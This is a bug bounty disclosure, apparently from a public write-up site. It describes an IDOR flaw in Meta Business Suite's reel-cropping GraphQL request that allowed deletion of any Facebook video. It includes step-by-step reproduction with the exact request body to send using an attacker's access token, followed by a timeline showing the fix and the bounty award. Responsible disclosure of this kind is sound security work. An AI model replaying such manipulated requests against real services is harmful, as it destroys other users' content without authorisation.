Bassem Bazzoun

Published On: 28 Dec 2022

$11,250

Delete any Video or Reel on Facebook

IDOR
Facebook | Web
---
HIGH VALID

In Meta business suite their is a new feature where you can create a reel. We are also able to trim and crop the reel.

Description

The graphql request responsible of cropping and trimming the reel is vulnerable and can be manipulated to crop any video on Facebook.

Impact

I was able to delete any video, live video and reels uploaded on Facebook.




Reproduction Steps

Step
1

UserAttacker
UserVictim

From UserVictim upload any video on your Facebook profile.

Step
2

From UserAttacker get your Facebook android app access token to use it later.

Step
3

Perform the below graphql POST request using UserAttacker access token and manipulate the video_id to the video id of step 1  : 

 

{
  "variables": {
    "videoClipsTimestamps": {
      "start_time_in_sec": 0.706,
      "end_time_in_sec": 7.721354166666667
    },
    "videoID": "VIDEO_ID_HERE",
    "reframeAspectRatios": [
      {
        "aspect_ratio_denominator": 11,
        "aspect_ratio_numerator": 1
      }
    ],
    "aggressiveness": 0
  },
  "doc_id": "8426940007331645"
}

Step
4

Wait for 5 mins and BOOMMM! The video will be deleted :)

Show Image

Timeline
.
Bassem 24 Oct 2022

Report sent

.
Facebook 25 Oct 2022

Triaged Hi Bassem M, Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We wil ... See More

.
Facebook 30 Nov 2022

Bug Fixed (The issue was fixed the next day after I reported it, but the confirmation fix message was sent in this day) Hi Bassem M, We have looked into ... See More

.
Facebook 13 Dec 2022

Bounty rewarded After reviewing this issue, we have decided to award you a bounty of $10000. Below is an explanation of the bounty amount. Meta fulfills its boun ... See More

.
Facebook 13 Dec 2022

Bounty rewarded (Delay Bonus) After reviewing this issue, we have decided to award you a bounty of $500. Below is an explanation of the bounty amount. Meta fulfills its bounty ... See More

VALID






Show All Images